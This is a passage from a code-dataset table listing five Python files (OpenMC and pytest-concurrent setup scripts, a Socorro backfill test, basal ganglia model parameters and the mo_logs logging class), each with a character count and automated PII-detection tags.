'http://cdn2-www.comingsoon.net/assets/uploads/gallery/ghost-in-the-shell/ghostinshellposter.jpg",'], ['URL', 'https://www.youtube.com/watch?v=G4VmJcZR0Yg"'], ['URL', 'media.Mo'], ['URL', 'media.Mo'], ['URL', 'KEY.jp'], ['URL', 'media.Mo'], ['URL', 'media.Mo'], ['URL', 'media.Mo'], ['URL', 'media.Mo'], ['URL', 'web.py']] |
16 | #!/usr/bin/env python
import glob
import numpy as np
try:
from setuptools import setup
have_setuptools = True
except ImportError:
from distutils.core import setup
have_setuptools = False
try:
from Cython.Build import cythonize
have_cython = True
except ImportError:
have_cython = False
kwargs = {'name': 'openmc',
'version': '0.8.0',
'packages': ['openmc', 'openmc.data', 'openmc.mgxs', 'openmc.model',
'openmc.stats'],
'scripts': glob.glob('scripts/openmc-*'),
# Metadata
'author': 'Will Boyd',
'author_email': dummy@email.com',
'description': 'OpenMC Python API',
'url': 'https://github.com/mit-crpg/openmc',
'classifiers': [
'Intended Audience :: Developers',
'Intended Audience :: End Users/Desktop',
'Intended Audience :: Science/Research',
'License :: OSI Approved :: MIT License',
'Natural Language :: English',
'Programming Language :: Python',
'Topic :: Scientific/Engineering'
]}
if have_setuptools:
kwargs.update({
# Required dependencies
'install_requires': ['six', 'numpy>=1.9', 'h5py', 'matplotlib'],
# Optional dependencies
'extras_require': {
'decay': ['uncertainties'],
'pandas': ['pandas>=0.17.0'],
'sparse' : ['scipy'],
'vtk': ['vtk', 'silomesh'],
'validate': ['lxml']
},
# Data files
'package_data': {
'openmc.data': ['mass.mas12', 'fission_Q_data_endfb71.h5']
},
})
# If Cython is present, add resonance reconstruction capability
if have_cython:
kwargs.update({
'ext_modules': cythonize('openmc/data/reconstruct.pyx'),
'include_dirs': [np.get_include()]
})
setup(**kwargs)
| 1,920 | [['EMAIL_ADDRESS', 'dummy@email.com'], ['URL', "https://github.com/mit-crpg/openmc',"], ['PERSON', 'openmc'], ['PERSON', "Will Boyd'"], ['PERSON', 'lxml'], ['IP_ADDRESS', ' '], ['IP_ADDRESS', ' :: '], ['URL', 'distutils.co'], ['URL', 'openmc.mg'], ['URL', 'openmc.mo'], ['URL', 'openmc.st'], ['URL', 'glob.gl'], ['URL', 'email.com'], ['URL', 'mass.ma'], ['URL', 'reconstruct.py'], ['URL', 'np.ge']] |
17 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import codecs
from setuptools import setup
def read(fname):
file_path = os.path.join(os.path.dirname(__file__), fname)
return codecs.open(file_path, encoding='utf-8').read()
setup(
name='pytest-concurrent',
version='0.2.2',
author='James Wang, Reverb Chu',
author_email='jamesw96@uw.edu, dummy@email.com',
maintainer='James Wang, Reverb Chu',
maintainer_email='jamesw96@uw.edu, dummy@email.com',
license='MIT',
url='https://github.com/reverbc/pytest-concurrent',
description='Concurrently execute test cases with multithread'
', multiprocess and gevent',
long_description=read('README.rst'),
packages=['pytest_concurrent', 'pytest_concurrent.modes'],
install_requires=[
'pytest>=3.1.1',
'psutil>=5.2.2'],
classifiers=[
'Development Status :: 4 - Beta',
'Framework :: Pytest',
'Intended Audience :: Developers',
'Topic :: Software Development :: Testing',
'Programming Language :: Python',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: Implementation :: CPython',
'Operating System :: OS Independent',
'License :: OSI Approved :: MIT License',
],
entry_points={
'pytest11': [
'concurrent = pytest_concurrent.plugin',
],
},
setup_requires=['pytest-runner'],
tests_require=['pytest'],
)
| 1,681 | [['EMAIL_ADDRESS', "author_email='jamesw96@uw.edu"], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', "maintainer_email='jamesw96@uw.edu"], ['EMAIL_ADDRESS', 'dummy@email.com'], ['PERSON', "author='James Wang"], ['PERSON', "Reverb Chu'"], ['PERSON', "maintainer='James Wang"], ['PERSON', "Reverb Chu'"], ['URL', "https://github.com/reverbc/pytest-concurrent',"], ['IP_ADDRESS', ' '], ['IP_ADDRESS', ' :: '], ['URL', 'os.path.jo'], ['URL', 'os.pa'], ['URL', 'uw.edu'], ['URL', 'email.com'], ['URL', 'uw.edu'], ['URL', 'email.com'], ['URL', 'README.rs'], ['URL', 'concurrent.mo'], ['URL', 'concurrent.pl']] |
18 | # This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
from .unittestbase import PostgreSQLTestCase
from nose.plugins.attrib import attr
from nose.tools import eq_, assert_raises
import datetime
from socorro.external.postgresql.backfill import Backfill
from socorro.external.postgresql import staticdata, fakedata
from socorro.external import MissingArgumentError
from socorro.lib import datetimeutil
#==============================================================================
@attr(integration='postgres')
class TestBackfill(PostgreSQLTestCase):
"""Tests the calling of all backfill functions"""
#--------------------------------------------------------------------------
def setUp(self):
""" Populate tables with fake data """
super(TestBackfill, self).setUp()
cursor = self.connection.cursor()
self.tables = []
for table in staticdata.tables + fakedata.tables:
# staticdata has no concept of duration
if table.__module__ == 'socorro.external.postgresql.staticdata':
table = table()
else:
table = table(days=1)
table.releases = {
'WaterWolf': {
'channels': {
'Nightly': {
'versions': [{
'number': '18.0',
'probability': 0.5,
'buildid': '%s000020'
}],
'adu': '10',
'repository': 'nightly',
'throttle': '1',
'update_channel': 'nightly',
},
},
'crashes_per_hour': '5',
'guid': dummy@email.com'
},
'B2G': {
'channels': {
'Nightly': {
'versions': [{
'number': '18.0',
'probability': 0.5,
'buildid': '%s000020'
}],
'adu': '10',
'repository': 'nightly',
'throttle': '1',
'update_channel': 'nightly',
},
},
'crashes_per_hour': '5',
'guid': dummy@email.com'
}
}
table_name = table.table
table_columns = table.columns
values = str(tuple(["%(" + i + ")s" for i in table_columns]))
columns = str(tuple(table_columns))
self.tables.append(table_name)
# TODO: backfill_reports_clean() sometimes tries to insert a
# os_version_id that already exists
if table_name is not "os_versions":
for rows in table.generate_rows():
data = dict(zip(table_columns, rows))
query = "INSERT INTO %(table)s " % {'table': table_name}
query = query + columns.replace("'", "").replace(",)", ")")
query = query + " VALUES "
query = query + values.replace(",)", ")").replace("'", "")
cursor.execute(query, data)
self.connection.commit()
#--------------------------------------------------------------------------
def tearDown(self):
""" Cleanup the database, delete tables and functions """
cursor = self.connection.cursor()
tables = str(self.tables).replace("[", "").replace("]", "")
cursor.execute("TRUNCATE " + tables.replace("'", "") + " CASCADE;")
self.connection.commit()
self.connection.close()
super(TestBackfill, self).tearDown()
#--------------------------------------------------------------------------
def setup_data(self):
self.now = datetimeutil.utc_now()
now = self.now.date()
yesterday = now - datetime.timedelta(days=1)
lastweek = now - datetime.timedelta(days=7)
now_str = datetimeutil.date_to_string(now)
yesterday_str = datetimeutil.date_to_string(yesterday)
lastweek_str = datetimeutil.date_to_string(lastweek)
self.test_source_data = {
# Test backfill_adu
'adu': {
'params': {
"update_day": yesterday_str,
},
'res_expected': [(True,)],
},
# Test backfill_all_dups
'all_dups': {
'params': {
"start_date": yesterday_str,
"end_date": now_str,
},
'res_expected': [(True,)],
},
# Test backfill_build_adu
'build_adu': {
'params': {
"update_day": yesterday_str,
},
'res_expected': [(True,)],
},
# Test backfill_correlations
'correlations': {
'params': {
"update_day": yesterday_str,
},
'res_expected': [(True,)],
},
# Test backfill_crashes_by_user_build
'crashes_by_user_build': {
'params': {
"update_day": yesterday_str,
},
'res_expected': [(True,)],
},
# Test backfill_crashes_by_user
'crashes_by_user': {
'params': {
"update_day": yesterday_str,
},
'res_expected': [(True,)],
},
# TODO: Test backfill_daily_crashes tries to insert into a table
# that do not exists. It can be fixed by creating a temporary one.
#'daily_crashes': {
# 'params': {
# "update_day": now_str,
# },
# 'res_expected': [(True,)],
# },
# Test backfill_exploitability
'exploitability': {
'params': {
"update_day": yesterday_str,
},
'res_expected': [(True,)],
},
# Test backfill_explosiveness
'explosiveness': {
'params': {
"update_day": yesterday_str,
},
'res_expected': [(True,)],
},
# Test backfill_home_page_graph_build
'home_page_graph_build': {
'params': {
"update_day": yesterday_str,
},
'res_expected': [(True,)],
},
# Test backfill_home_page_graph
'home_page_graph': {
'params': {
"update_day": yesterday_str,
},
'res_expected': [(True,)],
},
# Test backfill_matviews
'matviews': {
'params': {
"start_date": yesterday_str,
"reports_clean": 'false',
},
'res_expected': [(True,)],
},
# Test backfill_nightly_builds
'nightly_builds': {
'params': {
"update_day": yesterday_str,
},
'res_expected': [(True,)],
},
# Test backfill_rank_compare
'rank_compare': {
'params': {
"update_day": yesterday_str,
},
'res_expected': [(True,)],
},
# Test backfill_reports_clean
'reports_clean': {
'params': {
"start_date": yesterday_str,
"end_date": now_str,
},
'res_expected': [(True,)],
},
# TODO: Test backfill_reports_duplicates tries to insert into a
# table that do not exists. It can be fixed by using the update
# function inside of the backfill.
#'reports_duplicates': {
# 'params': {
# "start_date": yesterday_str,
# "end_date": now_str,
# },
# 'res_expected': [(True,)],
# },
# TODO: Test backfill_signature_counts tries to insert into
# tables and to update functions that does not exist.
#'signature_counts': {
# 'params': {
# "start_date": yesterday_str,
# "end_date": now_str,
# },
# 'res_expected': [(True,)],
# },
# Test backfill_tcbs_build
'tcbs_build': {
'params': {
"update_day": yesterday_str,
},
'res_expected': [(True,)],
},
# Test backfill_tcbs
'tcbs': {
'params': {
"update_day": yesterday_str,
},
'res_expected': [(True,)],
},
# Test backfill_weekly_report_partitions
'weekly_report_partitions': {
'params': {
"start_date": lastweek_str,
"end_date": now_str,
"table_name": 'raw_crashes',
},
'res_expected': [(True,)],
},
# TODO: Update Backfill to support signature_summary backfill
# through the API
#'signature_summary_products': {
# 'params': {
# "update_day": yesterday_str,
# },
# 'res_expected': [(True,)],
#},
#'signature_summary_installations': {
# 'params': {
# "update_day": yesterday_str,
# },
# 'res_expected': [(True,)],
#},
#'signature_summary_uptime': {
# 'params': {
# "update_day": yesterday_str,
# },
# 'res_expected': [(True,)],
#},
#'signature_summary_os': {
# 'params': {
# "update_day": yesterday_str,
# },
# 'res_expected': [(True,)],
#},
#'signature_summary_process_type': {
# 'params': {
# "update_day": yesterday_str,
# },
# 'res_expected': [(True,)],
#},
#'signature_summary_architecture': {
# 'params': {
# "update_day": yesterday_str,
# },
# 'res_expected': [(True,)],
#},
#'signature_summary_flash_version': {
# 'params': {
# "update_day": yesterday_str,
# },
# 'res_expected': [(True,)],
#},
#'signature_summary_device': {
# 'params': {
# "update_day": yesterday_str,
# },
# 'res_expected': [(True,)],
#},
#'signature_summary_graphics': {
# 'params': {
# "update_day": yesterday_str,
# },
# 'res_expected': [(True,)],
#},
}
#--------------------------------------------------------------------------
def test_get(self):
backfill = Backfill(config=self.config)
#......................................................................
# Test raise error if kind of backfill is not passed
params = {"backfill_type": ''}
assert_raises(MissingArgumentError, backfill.get, **params)
#......................................................................
# Test all the backfill functions
self.setup_data()
for test, data in self.test_source_data.items():
data['params']['backfill_type'] = str(test)
res = backfill.get(**data['params'])
eq_(res[0], data['res_expected'][0])
| 12,516 | [['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['LOCATION', 'staticdata.tables'], ['PERSON', 'table.releases'], ['PERSON', 'adu'], ['PERSON', 'crashes_per_hour'], ['PERSON', 'adu'], ['PERSON', 'crashes_per_hour'], ['PERSON', 'table_columns ='], ['DATE_TIME', 'yesterday'], ['LOCATION', 'lastweek_str'], ['LOCATION', 'datetimeutil.date_to_string(lastweek'], ['PERSON', 'TODO'], ['PERSON', 'TODO'], ['LOCATION', 'lastweek_str'], ['PERSON', 'signature_summary_device'], ['URL', 'http://mozilla.org/MPL/2.0/.'], ['URL', 'nose.plugins.at'], ['URL', 'nose.to'], ['URL', 'socorro.external.postgresql.ba'], ['URL', 'socorro.li'], ['URL', 'self.connection.cu'], ['URL', 'socorro.external.postgresql.st'], ['URL', 'table.re'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'table.co'], ['URL', 'table.ge'], ['URL', 'columns.re'], ['URL', 'values.re'], ['URL', 'self.connection.com'], ['URL', 'self.connection.cu'], ['URL', 'tables.re'], ['URL', 'self.connection.com'], ['URL', 'self.connection.cl'], ['URL', 'self.no'], ['URL', 'self.no'], ['URL', 'self.co'], ['URL', 'backfill.ge'], ['URL', 'self.se'], ['URL', 'data.it'], ['URL', 'backfill.ge']] |
19 | # -*- coding: utf-8 -*-
# -----------------------------------------------------------------------------
# Copyright (c) 2015, Nicolas P. Rougier
# Distributed under the (new) BSD License.
#
# Contributors: Nicolas P. Rougier (dummy@email.com)
# -----------------------------------------------------------------------------
# --- Time ---
ms = 0.001
dt = 1*ms
tau = 10*ms
# --- Learning ---
alpha_CUE = 0.050
alpha_LTP = 0.002
alpha_LTD = 0.001
# --- Sigmoid ---
Vmin = 0
Vmax = 20
Vh = 16
Vc = 3
# --- Model ---
decision_threshold = 40
noise = 0.001
CTX_rest = -3.0
STR_rest = 0.0
STN_rest = -10.0
GPI_rest = 10.0
THL_rest = -40.0
# --- Cues & Rewards ---
V_cue = 7
rewards = 3/3.,2/3.,1/3.,0/3.
# -- Weight ---
Wmin = 0.25
Wmax = 0.75
gains = { "CTX.cog -> STR.cog" : +1.0,
"CTX.mot -> STR.mot" : +1.0,
"CTX.ass -> STR.ass" : +1.0,
"CTX.cog -> STR.ass" : +0.2,
"CTX.mot -> STR.ass" : +0.2,
"CTX.cog -> STN.cog" : +1.0,
"CTX.mot -> STN.mot" : +1.0,
"STR.cog -> GPI.cog" : -2.0,
"STR.mot -> GPI.mot" : -2.0,
"STR.ass -> GPI.cog" : -2.0,
"STR.ass -> GPI.mot" : -2.0,
"STN.cog -> GPI.cog" : +1.0,
"STN.mot -> GPI.mot" : +1.0,
"GPI.cog -> THL.cog" : -0.25,
"GPI.mot -> THL.mot" : -0.25,
"THL.cog -> CTX.cog" : +0.4,
"THL.mot -> CTX.mot" : +0.4,
"CTX.cog -> THL.cog" : +0.1,
"CTX.mot -> THL.mot" : +0.1,
"CTX.mot -> CTX.mot" : +0.5,
"CTX.cog -> CTX.cog" : +0.5,
"CTX.ass -> CTX.ass" : +0.5,
"CTX.ass -> CTX.cog" : +0.01,
"CTX.ass -> CTX.mot" : +0.025,
"CTX.cog -> CTX.ass" : +0.025,
"CTX.mot -> CTX.ass" : +0.01,
}
| 1,837 | [['EMAIL_ADDRESS', 'dummy@email.com'], ['DATE_TIME', '2015'], ['PERSON', 'Nicolas P. Rougier'], ['PERSON', 'Nicolas P. Rougier'], ['PERSON', 'Vmin'], ['PERSON', 'Vmax'], ['PERSON', 'Wmax'], ['URL', 'email.com'], ['URL', 'CTX.co'], ['URL', 'STR.co'], ['URL', 'CTX.mo'], ['URL', 'STR.mo'], ['URL', 'CTX.as'], ['URL', 'STR.as'], ['URL', 'CTX.co'], ['URL', 'STR.as'], ['URL', 'CTX.mo'], ['URL', 'STR.as'], ['URL', 'CTX.co'], ['URL', 'STN.co'], ['URL', 'CTX.mo'], ['URL', 'STN.mo'], ['URL', 'STR.co'], ['URL', 'GPI.co'], ['URL', 'STR.mo'], ['URL', 'GPI.mo'], ['URL', 'STR.as'], ['URL', 'GPI.co'], ['URL', 'STR.as'], ['URL', 'GPI.mo'], ['URL', 'STN.co'], ['URL', 'GPI.co'], ['URL', 'STN.mo'], ['URL', 'GPI.mo'], ['URL', 'GPI.co'], ['URL', 'THL.co'], ['URL', 'GPI.mo'], ['URL', 'THL.mo'], ['URL', 'THL.co'], ['URL', 'CTX.co'], ['URL', 'THL.mo'], ['URL', 'CTX.mo'], ['URL', 'CTX.co'], ['URL', 'THL.co'], ['URL', 'CTX.mo'], ['URL', 'THL.mo'], ['URL', 'CTX.mo'], ['URL', 'CTX.mo'], ['URL', 'CTX.co'], ['URL', 'CTX.co'], ['URL', 'CTX.as'], ['URL', 'CTX.as'], ['URL', 'CTX.as'], ['URL', 'CTX.co'], ['URL', 'CTX.as'], ['URL', 'CTX.mo'], ['URL', 'CTX.co'], ['URL', 'CTX.as'], ['URL', 'CTX.mo'], ['URL', 'CTX.as']] |
20 | # encoding: utf-8
#
#
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this file,
# You can obtain one at http://mozilla.org/MPL/2.0/.
#
# Contact: Kyle Lahnakoski (dummy@email.com)
#
from __future__ import absolute_import, division, unicode_literals
import os
import platform
import sys
from datetime import datetime
from mo_dots import Data, FlatList, coalesce, is_data, is_list, listwrap, unwraplist, wrap
from mo_future import PY3, is_text, text
from mo_logs import constants, exceptions, strings
from mo_logs.exceptions import Except, LogItem, suppress_exception
from mo_logs.strings import CR, indent
_Thread = None
if PY3:
STDOUT = sys.stdout.buffer
else:
STDOUT = sys.stdout
class Log(object):
"""
FOR STRUCTURED LOGGING AND EXCEPTION CHAINING
"""
trace = False
main_log = None
logging_multi = None
profiler = None # simple pypy-friendly profiler
error_mode = False # prevent error loops
@classmethod
def start(cls, settings=None):
"""
RUN ME FIRST TO SETUP THE THREADED LOGGING
http://victorlin.me/2012/08/good-logging-practice-in-python/
log - LIST OF PARAMETERS FOR LOGGER(S)
trace - SHOW MORE DETAILS IN EVERY LOG LINE (default False)
cprofile - True==ENABLE THE C-PROFILER THAT COMES WITH PYTHON (default False)
USE THE LONG FORM TO SET THE FILENAME {"enabled": True, "filename": "cprofile.tab"}
profile - True==ENABLE pyLibrary SIMPLE PROFILING (default False) (eg with Profiler("some description"):)
USE THE LONG FORM TO SET FILENAME {"enabled": True, "filename": "profile.tab"}
constants - UPDATE MODULE CONSTANTS AT STARTUP (PRIMARILY INTENDED TO CHANGE DEBUG STATE)
"""
global _Thread
if not settings:
return
settings = wrap(settings)
Log.stop()
cls.settings = settings
cls.trace = coalesce(settings.trace, False)
if cls.trace:
from mo_threads import Thread as _Thread
_ = _Thread
# ENABLE CPROFILE
if settings.cprofile is False:
settings.cprofile = {"enabled": False}
elif settings.cprofile is True:
if isinstance(settings.cprofile, bool):
settings.cprofile = {"enabled": True, "filename": "cprofile.tab"}
if settings.cprofile.enabled:
from mo_threads import profiles
profiles.enable_profilers(settings.cprofile.filename)
if settings.profile is True or (is_data(settings.profile) and settings.profile.enabled):
Log.error("REMOVED 2018-09-02, Activedata revision 3f30ff46f5971776f8ba18")
# from mo_logs import profiles
#
# if isinstance(settings.profile, bool):
# profiles.ON = True
# settings.profile = {"enabled": True, "filename": "profile.tab"}
#
# if settings.profile.enabled:
# profiles.ON = True
if settings.constants:
constants.set(settings.constants)
logs = coalesce(settings.log, settings.logs)
if logs:
cls.logging_multi = StructuredLogger_usingMulti()
for log in listwrap(logs):
Log.add_log(Log.new_instance(log))
from mo_logs.log_usingThread import StructuredLogger_usingThread
cls.main_log = StructuredLogger_usingThread(cls.logging_multi)
@classmethod
def stop(cls):
"""
DECONSTRUCTS ANY LOGGING, AND RETURNS TO DIRECT-TO-stdout LOGGING
EXECUTING MULUTIPLE TIMES IN A ROW IS SAFE, IT HAS NO NET EFFECT, IT STILL LOGS TO stdout
:return: NOTHING
"""
main_log, cls.main_log = cls.main_log, StructuredLogger_usingStream(STDOUT)
main_log.stop()
@classmethod
def new_instance(cls, settings):
settings = wrap(settings)
if settings["class"]:
if settings["class"].startswith("logging.handlers."):
from mo_logs.log_usingHandler import StructuredLogger_usingHandler
return StructuredLogger_usingHandler(settings)
else:
with suppress_exception:
from mo_logs.log_usingLogger import make_log_from_settings
return make_log_from_settings(settings)
# OH WELL :(
if settings.log_type == "logger":
from mo_logs.log_usingLogger import StructuredLogger_usingLogger
return StructuredLogger_usingLogger(settings)
if settings.log_type == "file" or settings.file:
return StructuredLogger_usingFile(settings.file)
if settings.log_type == "file" or settings.filename:
return StructuredLogger_usingFile(settings.filename)
if settings.log_type == "console":
from mo_logs.log_usingThreadedStream import StructuredLogger_usingThreadedStream
return StructuredLogger_usingThreadedStream(STDOUT)
if settings.log_type == "mozlog":
from mo_logs.log_usingMozLog import StructuredLogger_usingMozLog
return StructuredLogger_usingMozLog(STDOUT, coalesce(settings.app_name, settings.appname))
if settings.log_type == "stream" or settings.stream:
from mo_logs.log_usingThreadedStream import StructuredLogger_usingThreadedStream
return StructuredLogger_usingThreadedStream(settings.stream)
if settings.log_type == "elasticsearch" or settings.stream:
from mo_logs.log_usingElasticSearch import StructuredLogger_usingElasticSearch
return StructuredLogger_usingElasticSearch(settings)
if settings.log_type == "email":
from mo_logs.log_usingEmail import StructuredLogger_usingEmail
return StructuredLogger_usingEmail(settings)
if settings.log_type == "ses":
from mo_logs.log_usingSES import StructuredLogger_usingSES
return StructuredLogger_usingSES(settings)
if settings.log_type.lower() in ["nothing", "none", "null"]:
from mo_logs.log_usingNothing import StructuredLogger
return StructuredLogger()
Log.error("Log type of {{log_type|quote}} is not recognized", log_type=settings.log_type)
@classmethod
def add_log(cls, log):
cls.logging_multi.add_log(log)
@classmethod
def note(
cls,
template,
default_params={},
stack_depth=0,
log_context=None,
**more_params
):
"""
:param template: *string* human readable string with placeholders for parameters
:param default_params: *dict* parameters to fill in template
:param stack_depth: *int* how many calls you want popped off the stack to report the *true* caller
:param log_context: *dict* extra key:value pairs for your convenience
:param more_params: *any more parameters (which will overwrite default_params)
:return:
"""
timestamp = datetime.utcnow()
if not is_text(template):
Log.error("Log.note was expecting a unicode template")
Log._annotate(
LogItem(
context=exceptions.NOTE,
format=template,
template=template,
params=dict(default_params, **more_params)
),
timestamp,
stack_depth+1
)
@classmethod
def unexpected(
cls,
template,
default_params={},
cause=None,
stack_depth=0,
log_context=None,
**more_params
):
"""
:param template: *string* human readable string with placeholders for parameters
:param default_params: *dict* parameters to fill in template
:param cause: *Exception* for chaining
:param stack_depth: *int* how many calls you want popped off the stack to report the *true* caller
:param log_context: *dict* extra key:value pairs for your convenience
:param more_params: *any more parameters (which will overwrite default_params)
:return:
"""
timestamp = datetime.utcnow()
if not is_text(template):
Log.error("Log.warning was expecting a unicode template")
if isinstance(default_params, BaseException):
cause = default_params
default_params = {}
if "values" in more_params.keys():
Log.error("Can not handle a logging parameter by name `values`")
params = Data(dict(default_params, **more_params))
cause = unwraplist([Except.wrap(c) for c in listwrap(cause)])
trace = exceptions.get_stacktrace(stack_depth + 1)
e = Except(exceptions.UNEXPECTED, template=template, params=params, cause=cause, trace=trace)
Log._annotate(
e,
timestamp,
stack_depth+1
)
@classmethod
def alarm(
cls,
template,
default_params={},
stack_depth=0,
log_context=None,
**more_params
):
"""
:param template: *string* human readable string with placeholders for parameters
:param default_params: *dict* parameters to fill in template
:param stack_depth: *int* how many calls you want popped off the stack to report the *true* caller
:param log_context: *dict* extra key:value pairs for your convenience
:param more_params: more parameters (which will overwrite default_params)
:return:
"""
timestamp = datetime.utcnow()
format = ("*" * 80) + CR + indent(template, prefix="** ").strip() + CR + ("*" * 80)
Log._annotate(
LogItem(
context=exceptions.ALARM,
format=format,
template=template,
params=dict(default_params, **more_params)
),
timestamp,
stack_depth + 1
)
alert = alarm
@classmethod
def warning(
cls,
template,
default_params={},
cause=None,
stack_depth=0,
log_context=None,
**more_params
):
"""
:param template: *string* human readable string with placeholders for parameters
:param default_params: *dict* parameters to fill in template
:param cause: *Exception* for chaining
:param stack_depth: *int* how many calls you want popped off the stack to report the *true* caller
:param log_context: *dict* extra key:value pairs for your convenience
:param more_params: *any more parameters (which will overwrite default_params)
:return:
"""
timestamp = datetime.utcnow()
if not is_text(template):
Log.error("Log.warning was expecting a unicode template")
if isinstance(default_params, BaseException):
cause = default_params
default_params = {}
if "values" in more_params.keys():
Log.error("Can not handle a logging parameter by name `values`")
params = Data(dict(default_params, **more_params))
cause = unwraplist([Except.wrap(c) for c in listwrap(cause)])
trace = exceptions.get_stacktrace(stack_depth + 1)
e = Except(exceptions.WARNING, template=template, params=params, cause=cause, trace=trace)
Log._annotate(
e,
timestamp,
stack_depth+1
)
@classmethod
def error(
cls,
template, # human readable template
default_params={}, # parameters for template
cause=None, # pausible cause
stack_depth=0,
**more_params
):
"""
raise an exception with a trace for the cause too
:param template: *string* human readable string with placeholders for parameters
:param default_params: *dict* parameters to fill in template
:param cause: *Exception* for chaining
:param stack_depth: *int* how many calls you want popped off the stack to report the *true* caller
:param log_context: *dict* extra key:value pairs for your convenience
:param more_params: *any more parameters (which will overwrite default_params)
:return:
"""
if not is_text(template):
sys.stderr.write(str("Log.error was expecting a unicode template"))
Log.error("Log.error was expecting a unicode template")
if default_params and isinstance(listwrap(default_params)[0], BaseException):
cause = default_params
default_params = {}
params = Data(dict(default_params, **more_params))
add_to_trace = False
if cause == None:
causes = None
elif is_list(cause):
causes = []
for c in listwrap(cause): # CAN NOT USE LIST-COMPREHENSION IN PYTHON3 (EXTRA STACK DEPTH FROM THE IN-LINED GENERATOR)
causes.append(Except.wrap(c, stack_depth=1))
causes = FlatList(causes)
elif isinstance(cause, BaseException):
causes = Except.wrap(cause, stack_depth=1)
else:
causes = None
Log.error("can only accept Exception, or list of exceptions")
trace = exceptions.get_stacktrace(stack_depth + 1)
if add_to_trace:
cause[0].trace.extend(trace[1:])
e = Except(context=exceptions.ERROR, template=template, params=params, cause=causes, trace=trace)
raise_from_none(e)
@classmethod
def _annotate(
cls,
item,
timestamp,
stack_depth
):
"""
:param itemt: A LogItemTHE TYPE OF MESSAGE
:param stack_depth: FOR TRACKING WHAT LINE THIS CAME FROM
:return:
"""
item.timestamp = timestamp
item.machine = machine_metadata
item.template = strings.limit(item.template, 10000)
item.format = strings.limit(item.format, 10000)
if item.format == None:
format = text(item)
else:
format = item.format.replace("{{", "{{params.")
if not format.startswith(CR) and format.find(CR) > -1:
format = CR + format
if cls.trace:
log_format = item.format = "{{machine.name}} (pid {{machine.pid}}) - {{timestamp|datetime}} - {{thread.name}} - \"{{location.file}}:{{location.line}}\" - ({{location.method}}) - " + format
f = sys._getframe(stack_depth + 1)
item.location = {
"line": f.f_lineno,
"file": text(f.f_code.co_filename),
"method": text(f.f_code.co_name)
}
thread = _Thread.current()
item.thread = {"name": thread.name, "id": thread.id}
else:
log_format = item.format = "{{timestamp|datetime}} - " + format
cls.main_log.write(log_format, item.__data__())
def write(self):
raise NotImplementedError
def _same_frame(frameA, frameB):
return (frameA.line, frameA.file) == (frameB.line, frameB.file)
# GET THE MACHINE METADATA
machine_metadata = wrap({
"pid": os.getpid(),
"python": text(platform.python_implementation()),
"os": text(platform.system() + platform.release()).strip(),
"name": text(platform.node())
})
def raise_from_none(e):
raise e
if PY3:
exec("def raise_from_none(e):\n raise e from None\n", globals(), locals())
from mo_logs.log_usingFile import StructuredLogger_usingFile
from mo_logs.log_usingMulti import StructuredLogger_usingMulti
from mo_logs.log_usingStream import StructuredLogger_usingStream
if not Log.main_log:
Log.main_log = StructuredLogger_usingStream(STDOUT)
| 15,833 | [['EMAIL_ADDRESS', 'dummy@email.com'], ['PERSON', 'Kyle Lahnakoski'], ['NRP', 'FlatList'], ['PERSON', 'LogItem'], ['PERSON', 'cprofile - True==ENABLE'], ['DATE_TIME', '2018-09-02'], ['PERSON', 'mo_logs.log_usingThread'], ['LOCATION', 'main_log'], ['NRP', 'mo_logs.log_usingLogger'], ['LOCATION', 'OH'], ['PERSON', 'LogItem'], ['PERSON', 'LogItem'], ['NRP', 'Log.error("can'], ['PERSON', 'format.find(CR'], ['PERSON', 'same_frame(frameA'], ['URL', 'http://mozilla.org/MPL/2.0/.'], ['URL', 'http://victorlin.me/2012/08/good-logging-practice-in-python/'], ['URL', 'email.com'], ['URL', 'logs.st'], ['URL', 'sys.st'], ['URL', 'sys.st'], ['URL', 'Log.st'], ['URL', 'cls.se'], ['URL', 'cls.tr'], ['URL', 'settings.tr'], ['URL', 'cls.tr'], ['URL', 'settings.cprofile.fi'], ['URL', 'settings.pro'], ['URL', 'settings.pro'], ['URL', 'settings.pro'], ['URL', 'Log.er'], ['URL', 'settings.pro'], ['URL', 'settings.pro'], ['URL', 'settings.pro'], ['URL', 'settings.co'], ['URL', 'constants.se'], ['URL', 'settings.co'], ['URL', 'Log.ad'], ['URL', 'Log.ne'], ['URL', 'cls.ma'], ['URL', 'cls.ma'], ['URL', 'cls.ma'], ['URL', 'log.st'], ['URL', 'settings.fi'], ['URL', 'settings.fi'], ['URL', 'settings.fi'], ['URL', 'settings.fi'], ['URL', 'settings.st'], ['URL', 'settings.st'], ['URL', 'settings.st'], ['URL', 'Log.er'], ['URL', 'multi.ad'], ['URL', 'Log.er'], ['URL', 'Log.no'], ['URL', 'exceptions.NO'], ['URL', 'Log.er'], ['URL', 'params.ke'], ['URL', 'Log.er'], ['URL', 'exceptions.ge'], ['URL', 'exceptions.AL'], ['URL', 'Log.er'], ['URL', 'params.ke'], ['URL', 'Log.er'], ['URL', 'exceptions.ge'], ['URL', 'sys.st'], ['URL', 'Log.er'], ['URL', 'Log.er'], ['URL', 'Log.er'], ['URL', 'Log.er'], ['URL', 'exceptions.ge'], ['URL', 'exceptions.ER'], ['URL', 'item.ma'], ['URL', 'strings.li'], ['URL', 'item.fo'], ['URL', 'strings.li'], ['URL', 'item.fo'], ['URL', 'item.fo'], ['URL', 'item.format.re'], ['URL', 'format.st'], ['URL', 'format.fi'], ['URL', 'cls.tr'], ['URL', 'item.fo'], ['URL', 'machine.na'], ['URL', 'thread.na'], ['URL', 'location.fi'], ['URL', 'location.li'], ['URL', 'location.me'], ['URL', 'code.co'], ['URL', 'code.co'], ['URL', 'Thread.cu'], ['URL', 'item.th'], ['URL', 'thread.na'], ['URL', 'thread.id'], ['URL', 'item.fo'], ['URL', 'cls.ma'], ['URL', 'frameA.li'], ['URL', 'frameA.fi'], ['URL', 'frameB.li'], ['URL', 'frameB.fi'], ['URL', 'os.ge'], ['URL', 'platform.py'], ['URL', 